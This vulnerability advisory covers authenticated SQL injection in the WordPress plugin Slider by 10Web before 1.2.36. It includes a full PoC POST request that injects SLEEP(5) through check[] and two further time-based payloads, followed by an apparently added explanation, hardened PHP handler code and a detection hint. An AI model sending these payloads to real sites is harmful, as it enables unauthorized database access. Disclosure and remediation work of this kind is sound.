Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection

2020-09-29T00:00:00
ID WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C
Type wpvulndb
Reporter Nguyen Anh Tien
Modified 2021-01-21T06:02:45

Description

The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or a medium one such as Contributor+ (if "Role Options" is turned on for other users), to perform SQL Injection attacks.

PoC

Vulnerable param: check[]
Vulnerable function: WDW_S_Library::get

POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

s=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate&current_id=

Other SQLi:

- File: admin/models/WDSModelWDSExport.php
  Function: export_full
  Params: slider_ids_string
  PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5

- File: admin/controllers/Sliders.php
  Function: save_slider_db
  Params: del_slide_ids_string
  PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5
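The pattern behind all three findings is an id list from the request being interpolated straight into an IN (...) clause, so a value like 1) AND SLEEP(5 closes the list and appends its own condition. The following is an added illustration, not the plugin's own code: the unsafe shape beside a hardened WordPress-style handler. The table name wdslider, the manage_options capability and the nonce action name are assumptions.

```php
<?php
// Added illustration, not code from the Slider by 10Web plugin. It shows why an
// id list built from request input is injectable and how a WordPress handler
// should build the same query. Assumptions: table {$wpdb->prefix}wdslider with an
// integer `id` column, the 'manage_options' capability, and the nonce action name.

// VULNERABLE PATTERN: the comma-joined string lands verbatim inside IN (...).
// The value "1) AND SLEEP(5" from the PoC closes the list and appends its own
// condition, which is what makes the time-based check succeed.
function wds_delete_sliders_unsafe( $del_slide_ids_string ) {
    global $wpdb;
    return $wpdb->query(
        "DELETE FROM {$wpdb->prefix}wdslider WHERE id IN ({$del_slide_ids_string})"
    );
}

// HARDENED PATTERN: coerce every candidate to an int, keep only positive ids,
// and bind each one through a %d placeholder in $wpdb->prepare(). intval()
// turns "1) AND SLEEP(5" into 1, so no request text ever reaches the SQL.
function wds_delete_sliders_safe( array $raw_ids ) {
    global $wpdb;

    $ids = array_filter( array_map( 'intval', $raw_ids ), function ( $id ) {
        return $id > 0;
    } );
    if ( empty( $ids ) ) {
        return 0; // nothing valid: never run IN () or an open-ended DELETE
    }

    // One %d per id, e.g. "%d,%d"; prepare() substitutes the integer values.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}wdslider WHERE id IN ({$placeholders})",
        array_values( $ids )
    );
    return $wpdb->query( $sql );
}

// Caller: the PoC carries its payload in the *keys* of check[] (check[SLEEP(5)]=on),
// so the keys, not the "on" values, are the untrusted ids to validate. The
// capability check keeps a Contributor-level account from reaching the delete.
function wds_handle_bulk_delete() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'nonce_wd', 'nonce_wd' ); // action name is an assumption
    $raw = isset( $_POST['check'] ) ? array_keys( (array) $_POST['check'] ) : array();
    return wds_delete_sliders_safe( $raw );
}
```

For detection, a request whose check[] keys or *_ids_string values contain anything other than digits and commas is a direct signal of this class of attempt against the affected endpoints.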